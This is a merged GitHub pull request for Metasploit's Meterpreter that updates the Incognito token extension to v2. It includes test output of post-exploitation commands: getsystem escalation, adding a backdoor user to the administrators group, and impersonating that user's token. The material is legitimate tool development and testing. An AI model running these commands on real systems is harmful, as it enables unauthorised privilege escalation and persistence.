Skip to content
This repository has been archived by the owner on Jan 22, 2024. It is now read-only.

Update to Incognito v2 #42

Merged
merged 2 commits into from
Nov 6, 2013
Merged

Update to Incognito v2 #42

merged 2 commits into from
Nov 6, 2013

Conversation

OJ
Copy link
Contributor

@OJ OJ commented Oct 29, 2013

Note: this PR relies on the VS2013 upgrade PR, so that needs to be merged first.

This commit updates to the latest version of the incognito code from: http://labs.mwrinfosecurity.com/blog/2012/07/18/incognito-v2-0-released/

This included a fix for Windows 2003 x64, which was reported as a bug in RM 8281.

Sample output post-fix:

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeDebugPrivilege
  SeIncreaseQuotaPrivilege
  SeSecurityPrivilege
  SeTakeOwnershipPrivilege
  SeLoadDriverPrivilege
  SeSystemProfilePrivilege
  SeSystemtimePrivilege
  SeProfileSingleProcessPrivilege
  SeIncreaseBasePriorityPrivilege
  SeCreatePagefilePrivilege
  SeBackupPrivilege
  SeRestorePrivilege
  SeShutdownPrivilege
  SeSystemEnvironmentPrivilege
  SeChangeNotifyPrivilege
  SeRemoteShutdownPrivilege
  SeUndockPrivilege
  SeManageVolumePrivilege

meterpreter > use incognito 
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
OJ-Y433WVQI694X\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

Test run on the same machine to make sure we haven't broken anything that was working before in other areas of incognito.

Adding users:

meterpreter > add_user fido fido
[*] Attempting to add user fido to host 127.0.0.1
[+] Successfully added user

meterpreter > shell
Process 2708 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            fido                     Guest                    
SUPPORT_388945a0         
The command completed with one or more errors.

Adding the user to a group:

meterpreter > add_localgroup_user administrators fido
[*] Attempting to add user fido to localgroup administrators on host 127.0.0.1
[+] Successfully added user to local group
meterpreter > shell
Process 2820 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>net localgroup administrators
net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
fido
The command completed successfully.

Impersonation:

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
OJ-Y433WVQI694X\Administrator
OJ-Y433WVQI694X\fido

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter > impersonate_token OJ-Y433WVQI694X\\fido
[+] Delegation token available
[+] Successfully impersonated user OJ-Y433WVQI694X\fido
meterpreter > getuid
Server username: OJ-Y433WVQI694X\fido

[FixRM #8281]

OJ added 2 commits October 29, 2013 13:46
@OJ
Upgrade to VS 2013
4a1815d
@OJ
Update incognito to v2
5117030 
Pulled the latest version of the incognito code from:
http://labs.mwrinfosecurity.com/blog/2012/07/18/incognito-v2-0-released/

This included a fix for Windows 2003 x64, which was reported as a bug in
RM 8281.
@metasploit-public-bot
Copy link

Merged build finished.

@metasploit-public-bot
Copy link

Test PASSED.
Refer to this link for build results: https://ci.metasploit.comjob/GPR-MeterpreterWin/3/

todb-r7 pushed a commit to todb-r7/meterpreter that referenced this pull request Nov 4, 2013
Land rapid7#42, post-VS2013
6643bb8
@todb-r7 todb-r7 mentioned this pull request Nov 4, 2013
Closed
todb-r7 pushed a commit to todb-r7/meterpreter that referenced this pull request Nov 6, 2013
Post V2013, Land rapid7#42, update incognito
852f532 
See also rapid7#46
@todb-r7 todb-r7 mentioned this pull request Nov 6, 2013
Merged
todb-r7 pushed a commit that referenced this pull request Nov 6, 2013
Land #48, containing #39, #42, and #43
3c1c039 
This lands #39, #42, and #43. #34 still needs work.
@todb-r7 todb-r7 merged commit 5117030 into rapid7:master Nov 6, 2013
@OJ OJ deleted the incognito_update_8281 branch November 7, 2013 04:57
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@OJ @metasploit-public-bot @todb-r7